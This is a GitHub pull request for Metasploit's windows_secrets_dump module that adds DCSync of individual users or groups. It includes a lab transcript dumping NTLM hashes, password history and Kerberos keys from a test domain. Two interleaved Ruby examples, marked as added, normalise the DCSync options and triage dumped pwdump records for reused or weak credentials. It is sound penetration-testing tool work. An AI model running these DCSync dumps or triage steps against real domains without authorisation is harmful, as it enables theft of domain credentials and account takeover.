
Dcsync individual #19643

Merged
merged 7 commits into from
Nov 18, 2024

Conversation

@smashery (Contributor) commented Nov 14, 2024

This PR adds some features to the windows_secrets_dump module, and fixes a bug.

  • Add the ability to perform a DCSync for an individual user or group.
  • Add the ability to only request Users (rather than also computers) or vice versa
  • Incidentally fixed a bug wherein the DC was queried multiple times for the same information, if there are other DCs present in the environment.

Requires rapid7/ruby_smb#278

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use windows_secrets_dump
  • Test the settings for KRB_TYPES (request users only, or computers only, or both)
  • Test the settings for KRB_USERS (request an individual group, or user, or a comma-separated list of either)
  • Verify the fix for the multi-DCSync query (multiple DCs should only result in a single query per user)
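
The option handling the PR describes (a comma-separated KRB_USERS list with stray spaces, names repeated, one DCSync per principal even when several DCs answer, and KRB_TYPES being ignored once specific users or groups are named), written out as an added Ruby example. This is not the module's code or the PR author's; the function and class names, the set of KRB_TYPES values and the per-DC planner are assumptions made here for illustration.

```ruby
# Added example, not code from the PR or from windows_secrets_dump.
# Normalises the KRB_USERS / KRB_TYPES options so that a comma-separated list
# with whitespace and repeated names yields one DCSync request per principal.
# Names (KRB_TYPES, resolve_dcsync_targets, DcsyncPlanner) are hypothetical.

KRB_TYPES = %w[ALL USERS_ONLY COMPUTERS_ONLY].freeze # assumed option values

# Returns { targets: [...], types: '...', warning: String|nil }.
#  - targets: distinct names, first spelling kept, original order preserved
#  - types:   the filter that will actually apply to the request
#  - warning: set when KRB_TYPES is overridden by an explicit KRB_USERS
def resolve_dcsync_targets(krb_users, krb_types = 'ALL')
  krb_types = krb_types.to_s.upcase
  raise ArgumentError, "unknown KRB_TYPES value #{krb_types.inspect}" unless KRB_TYPES.include?(krb_types)

  # Split on commas, tolerate surrounding whitespace, drop empty entries.
  names = krb_users.to_s.split(',').map(&:strip).reject(&:empty?)

  # Account and group names are case-insensitive in AD: dedupe on a downcased
  # key but keep the first spelling the operator supplied.
  seen = {}
  names.each { |n| seen[n.downcase] ||= n }
  targets = seen.values

  return { targets: [], types: krb_types, warning: nil } if targets.empty?

  # Specific users/groups were requested, so the type filter does not apply
  # (the module prints a warning to the same effect in the transcript above).
  warning = krb_types == 'ALL' ? nil : "Searching for specific users/groups; KRB_TYPES setting (#{krb_types}) will be ignored"
  { targets: targets, types: 'ALL', warning: warning }
end

# Remembers which principals have already been fetched so a domain with several
# DCs still results in exactly one DRSUAPI request per principal.
class DcsyncPlanner
  def initialize
    @done = {} # downcased principal => DC it was fetched from
  end

  # Returns the principals that still need a request against this DC and marks
  # them as done; anything fetched earlier (from any DC) is skipped.
  def plan(dc, targets)
    fresh = []
    targets.each do |t|
      key = t.downcase
      next if @done.key?(key)
      @done[key] = dc
      fresh << t
    end
    fresh
  end

  def queried_from
    @done.dup
  end
end

if __FILE__ == $PROGRAM_NAME
  r = resolve_dcsync_targets('Domain Admins, smcintyre,SMCINTYRE,, ', 'USERS_ONLY')
  puts r.inspect
  planner = DcsyncPlanner.new
  puts planner.plan('dc1.msflab.local', r[:targets]).inspect # both principals
  puts planner.plan('dc2.msflab.local', r[:targets]).inspect # nothing left to fetch
end
```

Dedupe happens before any network traffic, which is what makes the multi-DC fix observable: the second DC contributes no new requests rather than a second copy of each one.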

… domain

- Also only DCSync each user once (if they're specified multiple times in KRB_USERS)
- Also be resilient to spaces in the comma-separation
@smcintyre-r7 smcintyre-r7 added the blocked Blocked by one or more additional tasks label Nov 14, 2024
@smcintyre-r7 (Contributor) left a comment

Everything tested well and worked as intended. I tested all three options for KRB_TYPES and KRB_USERS being blank, an invalid name, a single username, a single group, a single name and a single group, and two names. Everything worked as intended. I've just left a couple of minor comments on this and one blocking comment on the RubySMB PR. Once the RubySMB comment is resolved, I'll land it and post a release so this can be updated with the gem bump.

Inline review comment on modules/auxiliary/gather/windows_secrets_dump.rb (outdated, resolved)
@smcintyre-r7 smcintyre-r7 removed the blocked Blocked by one or more additional tasks label Nov 15, 2024
@smcintyre-r7 (Contributor) commented

I've landed the RubySMB changes, so once this is updated to pull them in, I can get this merged too.

@smcintyre-r7 (Contributor) left a comment

Everything looks ready to go now. Thanks!

metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > set KRB_TYPES USERS_ONLY
KRB_TYPES => USERS_ONLY
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > set KRB_USERS "Domain Admins"
KRB_USERS => Domain Admins
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > run
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Opening Service Control Manager
[*] 192.168.159.10:445 - Binding to \svcctl...
[+] 192.168.159.10:445 - Bound to \svcctl
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Checking NoLMHash policy
[*] 192.168.159.10:445 - LMHashes are not being stored
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - Connecting to Security Account Manager (SAM) Remote Protocol
[*] 192.168.159.10:445 - Binding to \samr...
[+] 192.168.159.10:445 - Bound to \samr
[!] 192.168.159.10:445 - Searching for specific users/groups; KRB_TYPES setting (USERS_ONLY) will be ignored
[*] 192.168.159.10:445 - Binding to DRSR...
[*] 192.168.159.10:445 - Bound to DRSR
[*] 192.168.159.10:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=smcintyre,CN=Users,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=NELSON_LEE,OU=Test,OU=AWS,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=ERICH_BENJAMIN,OU=ServiceAccounts,OU=HRE,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=LEONA_FERRELL,OU=Devices,OU=AZR,OU=Tier 1,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=ROXANNE_FERNANDEZ,OU=Devices,OU=OGC,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=DENNIS_HORN,OU=Test,OU=OGC,OU=Stage,DC=msflab,DC=local
# SID's:
Administrator: S-1-5-21-3978004297-3499718965-4169012971-500
smcintyre: S-1-5-21-3978004297-3499718965-4169012971-1000
msflab.local\NELSON_LEE: S-1-5-21-3978004297-3499718965-4169012971-1206
msflab.local\ERICH_BENJAMIN: S-1-5-21-3978004297-3499718965-4169012971-1235
msflab.local\LEONA_FERRELL: S-1-5-21-3978004297-3499718965-4169012971-1891
msflab.local\ROXANNE_FERNANDEZ: S-1-5-21-3978004297-3499718965-4169012971-1933
msflab.local\DENNIS_HORN: S-1-5-21-3978004297-3499718965-4169012971-3175

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
msflab.local\NELSON_LEE:1206:aad3b435b51404eeaad3b435b51404ee:a27489fa2d49de0812645c22fe5226cf:::
msflab.local\ERICH_BENJAMIN:1235:aad3b435b51404eeaad3b435b51404ee:25c4d19002dad9283c3ee5ae46353e8a:::
msflab.local\LEONA_FERRELL:1891:aad3b435b51404eeaad3b435b51404ee:ceb9b9285249460a9592cdbb3d51daa2:::
msflab.local\ROXANNE_FERNANDEZ:1933:aad3b435b51404eeaad3b435b51404ee:62f841c6143d785427fdbacdbbfe9df4:::
msflab.local\DENNIS_HORN:3175:aad3b435b51404eeaad3b435b51404ee:cb19688e0869ba4d7343a1c106c3ae48:::

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202405131526,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202407311545,LastLogonTimestamp=202411111430,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
msflab.local\NELSON_LEE:1206:aad3b435b51404eeaad3b435b51404ee:a27489fa2d49de0812645c22fe5226cf:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092124,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\ERICH_BENJAMIN:1235:aad3b435b51404eeaad3b435b51404ee:25c4d19002dad9283c3ee5ae46353e8a:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092124,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\LEONA_FERRELL:1891:aad3b435b51404eeaad3b435b51404ee:ceb9b9285249460a9592cdbb3d51daa2:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092125,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\ROXANNE_FERNANDEZ:1933:aad3b435b51404eeaad3b435b51404ee:62f841c6143d785427fdbacdbbfe9df4:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092126,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\DENNIS_HORN:3175:aad3b435b51404eeaad3b435b51404ee:cb19688e0869ba4d7343a1c106c3ae48:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092128,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::

# Account Info:
## CN=Administrator,CN=Users,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: true
- Password last changed: 2024-05-13 15:26:38 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=smcintyre,CN=Users,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: true
- Password last changed: 2024-07-31 15:45:18 UTC
- Last logon: 2024-11-11 14:30:15 UTC
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=NELSON_LEE,OU=Test,OU=AWS,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:24:32 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=ERICH_BENJAMIN,OU=ServiceAccounts,OU=HRE,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:24:35 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=LEONA_FERRELL,OU=Devices,OU=AZR,OU=Tier 1,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:25:59 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=ROXANNE_FERNANDEZ,OU=Devices,OU=OGC,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:26:04 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=DENNIS_HORN,OU=Test,OU=OGC,OU=Stage,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:28:42 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false

# Password history (pwdump format - uid:rid:lmhash:nthash:::):
No password history for Administrator
smcintyre_history0:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
smcintyre_history1:1000:aad3b435b51404eeaad3b435b51404ee:767f507576f1d718d788d1227c396c36:::
No password history for msflab.local\NELSON_LEE
No password history for msflab.local\ERICH_BENJAMIN
No password history for msflab.local\LEONA_FERRELL
No password history for msflab.local\ROXANNE_FERNANDEZ
No password history for msflab.local\DENNIS_HORN

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:2b3e29b616fc9412aea4fc96312c43152ba29c8a887300d350e064862edd387b
Administrator:aes128-cts-hmac-sha1-96:8efde83f88ce91c93da6cc1a7b00c43c
Administrator:des-cbc-md5:baa440ea8389ad92
smcintyre:aes256-cts-hmac-sha1-96:9c25f301f577e1020a5e2f27d26a89fab9b6aa759c2f56c0ebdaf73ce7e24ad1
smcintyre:aes128-cts-hmac-sha1-96:c36c675513d0bef64047470ebe46fe36
smcintyre:des-cbc-md5:23ce0de679a4b5cb
msflab.local\NELSON_LEE:aes256-cts-hmac-sha1-96:1f0d6a977419b52b0a2ceea873e4c78596ee0dbb3026ea634dabd54d89b039df
msflab.local\NELSON_LEE:aes128-cts-hmac-sha1-96:05ffee3d658d7ed6d745daf45a1700ef
msflab.local\NELSON_LEE:des-cbc-md5:9816ab0e0e100437
msflab.local\ERICH_BENJAMIN:aes256-cts-hmac-sha1-96:dc20701e1fba0c189a23d3adcb9427ec206051f786bb9d5074bd14e3b70be814
msflab.local\ERICH_BENJAMIN:aes128-cts-hmac-sha1-96:f11cfcf6dc883c2b1f57b00ce88ff0a0
msflab.local\ERICH_BENJAMIN:des-cbc-md5:c164f1133b4013b9
msflab.local\LEONA_FERRELL:aes256-cts-hmac-sha1-96:e8916dc69343a1981fc2f739e19abe5bf0c3e8f5b672050015b85ac3795b4e83
msflab.local\LEONA_FERRELL:aes128-cts-hmac-sha1-96:20d0b722338e7b934cccc22ecd5ed5c5
msflab.local\LEONA_FERRELL:des-cbc-md5:85649ed51a8f890d
msflab.local\ROXANNE_FERNANDEZ:aes256-cts-hmac-sha1-96:b61930c2c3577c36740f4e090abf1d22dc1b9c52092fec395ac0338146969ed7
msflab.local\ROXANNE_FERNANDEZ:aes128-cts-hmac-sha1-96:4682188b580f1e17bf17ab47f6772d81
msflab.local\ROXANNE_FERNANDEZ:des-cbc-md5:8f1ca7b38583f16e
msflab.local\DENNIS_HORN:aes256-cts-hmac-sha1-96:bb03b8eb55a2e213d6e61b1f8818ef1e7115ebae226f92c958fd8a51b838dd8e
msflab.local\DENNIS_HORN:aes128-cts-hmac-sha1-96:648177996d33c6d34adba2e782eed340
msflab.local\DENNIS_HORN:des-cbc-md5:9d5e5b76b6207a89

# Clear text passwords:
No clear text passwords for MSFLAB\Administrator
No clear text passwords for MSFLAB\smcintyre
No clear text passwords for MSFLAB\NELSON_LEE
No clear text passwords for MSFLAB\ERICH_BENJAMIN
No clear text passwords for MSFLAB\LEONA_FERRELL
No clear text passwords for MSFLAB\ROXANNE_FERNANDEZ
No clear text passwords for MSFLAB\DENNIS_HORN
[*] 192.168.159.10:445 - Cleaning up...
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > 
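
What an operator does with the DOMAIN action's output once it is in hand: the lines below parse the "Full pwdump format" records the module prints and flag password reuse between accounts (the transcript above shows Administrator and smcintyre with the same NT hash, which means the same password), blank passwords, stored LM hashes, and privileged accounts whose passwords never expire or that have never logged on. This is an added example, not part of the PR or of the module; the sample records are a subset copied from the lab transcript above, and the function names are hypothetical.

```ruby
# Added example, not code from the PR or from windows_secrets_dump.
# Parses the "Full pwdump format" records the module prints:
#   user:rid:lmhash:nthash:Key=Value,Key=Value,...::
# and reports the things an operator checks first after a DCSync.

# Well-known hashes of an empty password.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# Records copied from the lab transcript above (single-quoted heredoc so the
# backslash in the domain-qualified names is kept literally).
SAMPLE_PWDUMP = <<~'PWDUMP'
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202405131526,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
  smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202407311545,LastLogonTimestamp=202411111430,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
  msflab.local\NELSON_LEE:1206:aad3b435b51404eeaad3b435b51404ee:a27489fa2d49de0812645c22fe5226cf:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092124,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
  msflab.local\DENNIS_HORN:3175:aad3b435b51404eeaad3b435b51404ee:cb19688e0869ba4d7343a1c106c3ae48:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092128,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
PWDUMP

Entry = Struct.new(:name, :rid, :lmhash, :nthash, :flags)

# One Entry per record; lines that do not look like pwdump records are skipped.
def parse_pwdump(text)
  text.each_line.map do |line|
    name, rid, lm, nt, meta = line.chomp.split(':', 5)
    next unless nt && nt.match?(/\A\h{32}\z/)
    flags = meta.to_s.sub(/::\z/, '').split(',').each_with_object({}) do |kv, h|
      k, v = kv.split('=', 2)
      h[k] = v
    end
    Entry.new(name, Integer(rid), lm.downcase, nt.downcase, flags)
  end.compact
end

# Privileged here means Domain Admin or Enterprise Admin per the module's flags.
def privileged?(e)
  %w[IsDomainAdmin IsEnterpriseAdmin].any? { |k| e.flags[k] == 'true' }
end

# Returns an array of human-readable findings.
def triage(entries)
  findings = []
  # The NT hash is unsalted MD4 of the UTF-16LE password, so identical hashes
  # on two accounts mean identical passwords.
  entries.group_by(&:nthash).each do |nt, es|
    findings << "shared password: #{es.map(&:name).join(', ')} (NT #{nt})" if es.size > 1
  end
  entries.each do |e|
    findings << "blank password: #{e.name}" if e.nthash == EMPTY_NT
    findings << "LM hash stored: #{e.name}" unless e.lmhash == EMPTY_LM
    next unless privileged?(e)
    findings << "privileged account with non-expiring password: #{e.name}" if e.flags['PasswordNeverExpires'] == 'true'
    findings << "privileged account that never logged on: #{e.name}" if e.flags['LastLogonTimestamp'] == 'never'
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  triage(parse_pwdump(SAMPLE_PWDUMP)).each { |f| puts f }
end
```

Feeding the full "Full pwdump format" section of a real run through `parse_pwdump` is enough to get the same report for the whole domain; the KRB_USERS option just narrows the dump to the accounts worth looking at first.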

@smcintyre-r7 smcintyre-r7 merged commit dd7e178 into rapid7:master Nov 18, 2024
82 checks passed
@smcintyre-r7 (Contributor) commented
Release Notes

This updates the DOMAIN action of the auxiliary/gather/windows_secrets_dump module to allow individual users or groups to be targeted.
